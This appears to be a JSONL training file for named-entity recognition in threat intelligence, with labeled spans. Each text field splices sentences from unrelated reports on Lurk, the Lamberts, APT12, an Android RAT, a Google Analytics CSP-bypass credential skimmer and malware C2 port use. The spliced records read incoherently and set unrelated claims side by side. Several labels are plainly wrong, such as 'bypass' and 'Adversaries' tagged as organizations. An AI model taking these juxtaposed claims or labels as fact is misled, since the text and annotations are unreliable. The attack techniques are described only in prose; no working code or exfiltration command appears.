[ . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software . Some of the names the attackers used for it include : Adobe Assistant , Migrated . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 71, "end": 88, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 300, "end": 315, "label": "System"}, {"start": 318, "end": 326, "label": "System"}]} {"text": "] com . 
If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . Upon installation , the malware starts communicating with one of its C&C servers . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 32, "end": 61, "label": "Malware"}, {"start": 79, "end": 114, "label": "Malware"}, {"start": 148, "end": 164, "label": "Malware"}, {"start": 266, "end": 269, "label": "System"}, {"start": 342, "end": 352, "label": "Malware"}]} {"text": "Based on our research and Beno\u00eet Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server . As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users . Most of the samples appeared to have at least three C&C servers hard coded for redundancy . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 72, "end": 89, "label": "Organization"}, {"start": 236, "end": 240, "label": "System"}, {"start": 416, "end": 419, "label": "System"}, {"start": 456, "end": 468, "label": "Organization"}]} {"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions . Some samples alternatively use an FGKD.jsp or an FPK.jsp file . 
Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 208, "end": 221, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 328, "end": 350, "label": "Organization"}, {"start": 387, "end": 395, "label": "Indicator"}, {"start": 402, "end": 409, "label": "Indicator"}]} {"text": "Coralco Tech is an organization located in Cyprus and providing interception tools . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . The Base64 blob is of particular interest . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 263, "end": 269, "label": "System"}, {"start": 277, "end": 281, "label": "System"}, {"start": 328, "end": 368, "label": "System"}, {"start": 409, "end": 494, "label": "Indicator"}]} {"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked . which they launched targeted attacks against Russian banks , businesses and media companies . It makes use of a custom Base64 alphabet . 
A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": [{"start": 27, "end": 40, "label": "Organization"}, {"start": 45, "end": 57, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 329, "end": 336, "label": "System"}]} {"text": "Coralco Tech 's services description . Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": [{"start": 39, "end": 43, "label": "System"}, {"start": 100, "end": 131, "label": "Malware"}, {"start": 308, "end": 311, "label": "System"}]} {"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" . 
To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 820, "end": 823, "label": "Organization"}, {"start": 862, "end": 869, "label": "System"}, {"start": 921, "end": 924, "label": "System"}]} {"text": "The C2 server domain is linked to Thai food : Nampriknum [ . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia . Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 46, "end": 60, "label": "Indicator"}, {"start": 219, "end": 260, "label": "Organization"}, {"start": 263, "end": 282, "label": "Organization"}, {"start": 285, "end": 301, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 497, "end": 508, "label": "Organization"}, {"start": 511, "end": 514, "label": "Organization"}]} {"text": "] net : Nam Phrik Num Somtum [ . 
A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 . Instead , the attackers manually cut and pasted older versions after altering some parts . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 22, "end": 32, "label": "Indicator"}, {"start": 375, "end": 387, "label": "System"}]} {"text": "] today : Som Tum We also identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware . it reports to was created on August 10 , 2011 . The malware ID seems to be a campaign code with a different IP address for each attack . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 123, "end": 131, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 168, "end": 176, "label": "Malware"}, {"start": 363, "end": 443, "label": "Vulnerability"}]} {"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims . Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 . 
Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 143, "end": 151, "label": "System"}, {"start": 279, "end": 288, "label": "Malware"}, {"start": 291, "end": 299, "label": "Malware"}, {"start": 302, "end": 310, "label": "Malware"}, {"start": 313, "end": 322, "label": "Malware"}, {"start": 325, "end": 331, "label": "Malware"}, {"start": 334, "end": 340, "label": "Malware"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 389, "end": 409, "label": "System"}, {"start": 412, "end": 425, "label": "Organization"}]} {"text": "The original leak is no longer available on github.com , but a copy can be found here . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . The IXESHE campaign has been successfully executing targeted attacks since 2009 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 133, "end": 145, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 273, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 401, "end": 417, "label": "Organization"}, {"start": 436, "end": 439, "label": "Organization"}, {"start": 499, "end": 507, "label": "Organization"}]} {"text": "The table below shows the commands available to the operator for tasking on infected devices . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe . 
The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits\u2014one in 2009 and another in 2011 . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 136, "end": 148, "label": "System"}, {"start": 180, "end": 205, "label": "Organization"}, {"start": 256, "end": 260, "label": "Indicator"}, {"start": 299, "end": 311, "label": "System"}, {"start": 314, "end": 321, "label": "System"}, {"start": 328, "end": 340, "label": "System"}, {"start": 368, "end": 376, "label": "Vulnerability"}, {"start": 478, "end": 481, "label": "Organization"}]} {"text": "This malware is simplistic in comparison to some modern-day Android malware . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers . While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 101, "end": 125, "label": "System"}, {"start": 151, "end": 168, "label": "System"}, {"start": 171, "end": 187, "label": "System"}, {"start": 194, "end": 200, "label": "System"}, {"start": 381, "end": 399, "label": "System"}]} {"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . 
They kept track of their targeted attacks by embedding a \u201c campaign tag \u201d in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 159, "end": 181, "label": "System"}, {"start": 232, "end": 239, "label": "Organization"}, {"start": 262, "end": 278, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 537, "end": 544, "label": "System"}, {"start": 590, "end": 593, "label": "Organization"}]} {"text": "The commands are self-explanatory and show the features included in the malware . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions . We found more than 40 of these campaign tags . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 109, "end": 121, "label": "System"}, {"start": 174, "end": 187, "label": "System"}]} {"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related . The IXESHE attackers are notable for their use of compromised machines within a target \u2019s internal network as C&C servers . 
In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 178, "end": 191, "label": "System"}, {"start": 223, "end": 235, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 432, "end": 435, "label": "System"}, {"start": 453, "end": 478, "label": "System"}, {"start": 568, "end": 587, "label": "Indicator"}, {"start": 631, "end": 634, "label": "Organization"}]} {"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families . This helped disguise their activities . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 196, "end": 217, "label": "System"}, {"start": 264, "end": 269, "label": "System"}, {"start": 274, "end": 303, "label": "System"}, {"start": 381, "end": 409, "label": "Malware"}]} {"text": "Version # 1 : June 2019 \u2014 Domain : databit [ . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition , the attackers \u2019 use of the proxy tool , HTran , also helped mask their true location . 
The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 35, "end": 46, "label": "Indicator"}, {"start": 172, "end": 188, "label": "Vulnerability"}, {"start": 191, "end": 204, "label": "Vulnerability"}, {"start": 263, "end": 268, "label": "System"}, {"start": 330, "end": 364, "label": "Vulnerability"}]} {"text": "] today During our investigation , we identified at least four major releases of the RAT . This migration activity was last observed in October 2016 . While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 216, "end": 222, "label": "Organization"}, {"start": 376, "end": 474, "label": "Indicator"}]} {"text": "The permissions on the first version of the malware lay out the foundations of a spying trojan . Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address . While the malware used in the attacks were not very complicated by nature , these proved very effective . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 109, "end": 139, "label": "System"}]} {"text": "Permissions The package name follows the original style name used on DenDroid . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll \u2013 it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice . APT12 . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 69, "end": 77, "label": "Malware"}, {"start": 112, "end": 124, "label": "System"}, {"start": 129, "end": 140, "label": "System"}, {"start": 145, "end": 156, "label": "System"}, {"start": 218, "end": 226, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 401, "end": 417, "label": "System"}]} {"text": "The code is obfuscated but not packed . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 . The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": [{"start": 40, "end": 53, "label": "System"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 332, "end": 343, "label": "Organization"}]} {"text": "This malware also contains a screen recorder . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 . APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army . 
For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": [{"start": 51, "end": 67, "label": "System"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 222, "end": 254, "label": "Organization"}, {"start": 271, "end": 350, "label": "Indicator"}]} {"text": "This feature is implemented using another open-source software package that can be found here . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": [{"start": 165, "end": 181, "label": "System"}, {"start": 198, "end": 211, "label": "System"}, {"start": 248, "end": 264, "label": "Vulnerability"}, {"start": 267, "end": 280, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 327, "end": 353, "label": "Organization"}, {"start": 356, "end": 359, "label": "Organization"}, {"start": 370, "end": 381, "label": "Organization"}]} {"text": "The service is implemented in the class com.serenegiant.service.ScreenRecorderService which is declared in the package manifest . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan . 
Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": [{"start": 40, "end": 85, "label": "Indicator"}, {"start": 173, "end": 181, "label": "System"}, {"start": 217, "end": 222, "label": "System"}, {"start": 225, "end": 238, "label": "System"}, {"start": 241, "end": 249, "label": "System"}, {"start": 254, "end": 259, "label": "System"}, {"start": 424, "end": 427, "label": "Organization"}, {"start": 464, "end": 475, "label": "Organization"}]} {"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used the same strategy after compromising the New York Times in Oct 2012 . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": [{"start": 157, "end": 165, "label": "System"}, {"start": 201, "end": 206, "label": "System"}, {"start": 209, "end": 222, "label": "System"}, {"start": 225, "end": 233, "label": "System"}, {"start": 238, "end": 243, "label": "System"}, {"start": 500, "end": 505, "label": "Organization"}, {"start": 552, "end": 566, "label": "Organization"}, {"start": 696, "end": 706, "label": "Organization"}, {"start": 711, "end": 750, "label": "Indicator"}]} {"text": "It remains available within the source code but no method of use takes place . 
On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times . Much like Darwin \u2019s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": [{"start": 191, "end": 207, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 424, "end": 438, "label": "Malware"}, {"start": 443, "end": 548, "label": "Indicator"}]} {"text": "Version # 2 : June - Aug. 2019 \u2014 Domain : somtum [ . Cadelle , uses Backdoor.Cadelspy . FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": [{"start": 42, "end": 52, "label": "Indicator"}, {"start": 68, "end": 85, "label": "System"}, {"start": 88, "end": 95, "label": "Organization"}, {"start": 189, "end": 198, "label": "Malware"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 226, "end": 289, "label": "Indicator"}]} {"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date . Both backdoors were dropped from malicious documents built utilizing the \u201c Tran Duy Linh \u201d exploit kit , which exploited CVE-2012-0158 . 
BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": [{"start": 156, "end": 164, "label": "Organization"}, {"start": 394, "end": 407, "label": "System"}, {"start": 440, "end": 453, "label": "Vulnerability"}, {"start": 456, "end": 463, "label": "Malware"}, {"start": 464, "end": 498, "label": "Indicator"}, {"start": 526, "end": 534, "label": "Malware"}, {"start": 535, "end": 582, "label": "Indicator"}, {"start": 626, "end": 635, "label": "Malware"}, {"start": 640, "end": 708, "label": "Indicator"}]} {"text": "Code structure Obviously , this code is not obfuscated when compared with the previous version it becomes clear that this is the same code base . Chafer , uses Backdoor.Remexi . These documents were also emailed to organizations in Japan and Taiwan . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": [{"start": 160, "end": 175, "label": "System"}, {"start": 270, "end": 283, "label": "Organization"}, {"start": 312, "end": 395, "label": "Indicator"}]} {"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE . 
Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": [{"start": 241, "end": 246, "label": "Organization"}, {"start": 267, "end": 276, "label": "Malware"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 365, "end": 374, "label": "Malware"}, {"start": 377, "end": 390, "label": "Malware"}, {"start": 427, "end": 482, "label": "Indicator"}, {"start": 485, "end": 496, "label": "Malware"}, {"start": 497, "end": 592, "label": "Indicator"}]} {"text": "A new class was added called com.utils.RestClient . Chafer , uses Backdoor.Remexi.B . Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": [{"start": 29, "end": 49, "label": "Indicator"}, {"start": 66, "end": 83, "label": "System"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 220, "end": 227, "label": "Malware"}]} {"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places . registrant information points to activity possibly as early as 2011 . However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 . 
Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": [{"start": 60, "end": 77, "label": "Indicator"}, {"start": 209, "end": 219, "label": "Malware"}, {"start": 260, "end": 267, "label": "Malware"}, {"start": 272, "end": 280, "label": "Malware"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}, {"start": 516, "end": 557, "label": "Indicator"}]} {"text": "Just like in previous examples , the malware author does not use this package . These threats are capable of opening a back door and stealing information from victims' computers . From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server . GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": [{"start": 211, "end": 218, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 244, "end": 251, "label": "Malware"}, {"start": 299, "end": 303, "label": "Indicator"}, {"start": 320, "end": 339, "label": "System"}, {"start": 342, "end": 344, "label": "System"}, {"start": 356, "end": 365, "label": "Malware"}, {"start": 370, "end": 503, "label": "Indicator"}, {"start": 506, "end": 516, "label": "Malware"}, 
{"start": 521, "end": 586, "label": "Indicator"}, {"start": 589, "end": 597, "label": "Malware"}, {"start": 598, "end": 653, "label": "Indicator"}, {"start": 656, "end": 664, "label": "Malware"}, {"start": 669, "end": 705, "label": "Indicator"}, {"start": 739, "end": 760, "label": "Malware"}, {"start": 761, "end": 874, "label": "Indicator"}, {"start": 877, "end": 882, "label": "Malware"}, {"start": 892, "end": 905, "label": "Indicator"}, {"start": 910, "end": 930, "label": "System"}]} {"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature . executable compilation times suggest early 2012 . RIPTIDE \u2019s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication . Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": [{"start": 178, "end": 185, "label": "Malware"}, {"start": 218, "end": 220, "label": "System"}, {"start": 330, "end": 349, "label": "Malware"}, {"start": 354, "end": 434, "label": "Indicator"}]} {"text": "The ACCESS_SUPERUSER may have been removed because it was deprecated upon the release of Android 5.0 Lollipop which happened in 2014 . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy . In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth . 
Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": [{"start": 89, "end": 100, "label": "System"}, {"start": 101, "end": 109, "label": "System"}, {"start": 185, "end": 202, "label": "System"}, {"start": 219, "end": 224, "label": "Organization"}, {"start": 270, "end": 286, "label": "Malware"}, {"start": 295, "end": 297, "label": "System"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 344, "end": 397, "label": "Indicator"}]} {"text": "The reality is that the RAT permissions can be implemented just with the permissions declared on the manifest , thus there is no need for higher permissions . The affected organizations we were able to identify are mostly based in the Middle East . The blog highlighted that the backdoor was utilized in campaigns from March 2011 till May 2014 . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": [{"start": 346, "end": 354, "label": "Malware"}, {"start": 355, "end": 482, "label": "Indicator"}, {"start": 485, "end": 490, "label": "Malware"}, {"start": 500, "end": 509, "label": "Indicator"}, {"start": 514, "end": 540, "label": "System"}, {"start": 550, "end": 565, "label": "Organization"}, {"start": 572, "end": 585, "label": "Organization"}, {"start": 591, "end": 610, "label": "Indicator"}, {"start": 619, "end": 630, "label": "System"}, {"start": 643, "end": 654, "label": "Indicator"}, {"start": 659, "end": 668, "label": "Indicator"}]} {"text": "Version # 3 : Sept. - Dec. 2019 \u2014 Domain : ponethus [ . one organization is located in the US . Following the release of the article , FireEye observed a distinct change in RIPTIDE \u2019s protocols and strings . 
PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": [{"start": 43, "end": 55, "label": "Indicator"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 208, "end": 216, "label": "Malware"}, {"start": 225, "end": 230, "label": "System"}, {"start": 231, "end": 245, "label": "Indicator"}, {"start": 250, "end": 256, "label": "System"}]} {"text": "] com Given that there is some overlap in the previous two versions , it came as no surprise to us that we finally identified a sample which is an evolution based on both previous versions . There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran . We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors . PoetRAT used TLS to encrypt communications over port 143 QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": [{"start": 354, "end": 359, "label": "Organization"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 434, "end": 441, "label": "Malware"}, {"start": 447, "end": 450, "label": "System"}, {"start": 477, "end": 490, "label": "Indicator"}, {"start": 491, "end": 500, "label": "Malware"}, {"start": 509, "end": 518, "label": "Indicator"}]} {"text": "This sample is clearly a mix between the two . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules . 
RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": [{"start": 47, "end": 53, "label": "System"}, {"start": 181, "end": 188, "label": "Malware"}, {"start": 236, "end": 243, "label": "Malware"}, {"start": 262, "end": 271, "label": "Malware"}, {"start": 276, "end": 324, "label": "Indicator"}, {"start": 363, "end": 372, "label": "System"}, {"start": 379, "end": 393, "label": "Indicator"}]} {"text": "This is also the first version where the package name changes into something that a less aware user may be tricked by , com.android.playup . Their primary interest appears to be gathering intelligence . FireEye dubbed this new malware family HIGHTIDE . RTM used Port 44443 for its VNC module .", "spans": [{"start": 120, "end": 138, "label": "Indicator"}, {"start": 203, "end": 210, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 253, "end": 256, "label": "Organization"}, {"start": 262, "end": 272, "label": "Indicator"}, {"start": 281, "end": 291, "label": "System"}]} {"text": "This version brings back the ACCESS_SUPERUSER and READ_FRAME_BUFFER permissions . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant . On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry . 
Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": [{"start": 191, "end": 204, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 306, "end": 311, "label": "System"}, {"start": 322, "end": 342, "label": "Organization"}, {"start": 354, "end": 367, "label": "Organization"}, {"start": 377, "end": 386, "label": "Indicator"}, {"start": 425, "end": 439, "label": "System"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 459, "end": 467, "label": "Indicator"}, {"start": 539, "end": 549, "label": "Organization"}, {"start": 559, "end": 564, "label": "System"}, {"start": 565, "end": 579, "label": "Indicator"}, {"start": 583, "end": 603, "label": "System"}, {"start": 606, "end": 614, "label": "Malware"}, {"start": 624, "end": 633, "label": "Indicator"}, {"start": 638, "end": 664, "label": "System"}]} {"text": "However , this time , the permission is actually used . security policy in the Eastern Europe and South Caucasus regions . Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 . 
